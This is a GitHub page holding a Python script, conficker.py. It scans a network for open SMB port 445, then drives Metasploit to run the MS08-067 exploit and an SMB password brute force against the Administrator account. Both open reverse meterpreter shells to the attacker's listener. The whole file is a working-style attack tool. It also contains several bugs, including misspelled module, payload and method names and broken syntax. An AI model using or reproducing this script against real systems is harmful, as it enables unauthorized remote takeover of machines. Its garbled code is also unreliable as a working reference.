-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathconficker.py
More file actions
75 lines (69 loc) · 2.75 KB
/
conficker.py
File metadata and controls
75 lines (69 loc) · 2.75 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
# coding=UTF-8
import os
import optparse
import sys
import nmap
def findTgts(subNet):
nmScan = nmap.PortScanner()
nmScan.scan(subNet,'445')
tgtHosts = []
for host in nmScan.all_hosts():
if nmScan[host].has_tcp(445):
state = nmScan[host]['tcp'][445]['state']
if state == 'open':
print('[+] Found Target Host:' + host)
tgtHosts.append(host)
return tgtHosts
def setupHandler(configFile,lhost,lport):
configFile.write('use exploit/multi/handler\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT' + str(lport) + '\n')
configFile.write('set LHOST' + lhost + '\n')
configFile.write('exploit -j -z\n')
configFile.write('setg DisablePayloadHandler 1\n')
def confickerExploit(configFile,tgtHost,lhost,lport):
configFile.write('use exploit/windows/smb/sms08_067_netapi\n')
configFile.write('set RHOST' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD windows/meterpreter/revserse_tcp\n')
configFile.write('set LPORT' + str(lport) +'\n')
configFile.write('set LHOST' + lhost + '\n')
configFile.write('exploit -j -z\n')
def smbBrute(configFile,tgtHost,passwdFile,lhost,lport):
username = 'Administrator'
pF = open(passwdFile,'r')
for password in pF.readlines();
password = password.strip('\n').strip('\r')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser ' + str(username) + '\n')
configFile.write('set SMBPass ' + str(password) + '\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
def main():
configFile = open('meta.rc','w')
parser = optparse.OptionParser('[-] Usage%prog -H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]')
parser.add_option('-H',dest='tgtHost',type='string',help='specify the target address[es]')
parser.add_option('-p',dest='lport',type='string',help='specify the listen port')
parser.add_option('-l',dest='lhost',type='string',help='specify the listen address')
parser.add_option('-F',dest='passwdFile',type='string',help='password file for SMB brute force attempt')
(options,args) = parser.pasre_args()
if(options.tgtHost == None)|(options.lhost == None):
print(parser.usage)
exit(0)
lhost = options.lhost
lport = options.lport
if lport == None:
lport = '1337'
passwdFile = options.passwdFile
tgtHosts = findTgts(options.tgtHost)
setupHandler(configFile,lhost,lport)
for tgtHost in tgtHosts:
confickerExploit(configFile,tgtHost,lhost,lport)
if passwdFile != None:
smbBrute(configFile,tgtHost,passwdFile,lhost,lport)
configFile.close()
os.system('msfconsole -r meta.rc')
if __name__ == '__main__':
main()